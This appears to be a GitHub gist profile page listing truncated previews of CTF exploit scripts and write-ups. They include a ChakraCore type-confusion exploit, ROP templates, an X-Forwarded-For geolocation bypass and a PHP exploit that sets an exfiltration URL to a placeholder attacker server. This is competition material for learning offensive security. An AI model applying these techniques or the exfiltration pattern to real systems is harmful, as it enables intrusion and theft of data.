Skip to content

Instantly share code, notes, and snippets.

Avatar

Edgar Boda-Majer eboda

View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am eboda on github.
  • I am eboda (https://keybase.io/eboda) on keybase.
  • I have a public key whose fingerprint is F8B6 1392 DBFC 9B65 EB8C 4955 EBE1 91C1 FFBD 546A

To claim this, I am signing this object:

@eboda
eboda / split.sh
Created Nov 12, 2014
diff splitter
View split.sh
#!/bin/sh
sed '/^-/d' $1 | sed -e 's/^+/ /g' > $1.after
sed '/^+/d' $1 | sed -e 's/^-/ /g' > $1.before
@eboda
eboda / exploit.py
Created Mar 17, 2015
codegate ctf BOOKSTORE exploit
View exploit.py
#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
print "=== local exploit"
View template.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
View ropbaby.py
#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string
@eboda
eboda / go.py
Created Dec 29, 2016
hohoho solution
View go.py
import sys
m = {
'0' : '$[$?/$$]',
'1' : '$?',
'2' : '$[$?+$?]',
'3' : '$[$?+$?+$?]',
'4' : '$[$?+$?+$?+$?]',
'5' : '$[$?+$?+$?+$?+$?]',
'6' : '$[($?+$?+$?)*($?+$?)]',
@eboda
eboda / exploit.js
Last active Sep 15, 2019
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
View exploit.js
////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else
@eboda
eboda / pwn.py
Last active Jun 11, 2017
SHA2017 crypto writeup
View pwn.py
import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
rgb = []
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
for i in range(20, 480, 40):
rgb.append(pixel(flag, i))
@eboda
eboda / sha2017.md
Created Jun 11, 2017
SHA2017 web100 writeup
View sha2017.md

SHA2017 web100

Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag

@eboda
eboda / exploit.php
Last active Dec 29, 2017
34C3 CTF urlstorage exploit
View exploit.php
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
You can’t perform that action at this time.